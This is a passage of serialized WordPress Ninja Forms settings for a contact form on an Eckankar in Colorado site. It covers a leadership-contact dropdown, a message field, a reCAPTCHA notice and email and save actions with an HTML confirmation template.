Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_37\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_37\";}s:2:\"id\";i:125;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_38\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_38\";}s:2:\"id\";i:126;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:37:\"Colorado Springs Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:196:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:196:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_39\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:37:\"Colorado Springs Leadership Positions\";s:9:\"field_key\";s:7:\"html_39\";}s:2:\"id\";i:127;}i:8;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_40\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_40\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:128;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_41\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_41\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:129;}i:10;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663801397261\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"641\";}i:11;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_43\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_43\";}s:2:\"id\";i:131;}i:12;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663801395614\";}s:2:\"id\";s:3:\"642\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:54\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:45;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:53\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_35}\";s:13:\"email_subject\";s:42:\"Colorado Springs Leadership Communications\";s:13:\"email_message\";s:3691:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_33},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:46;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:53\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 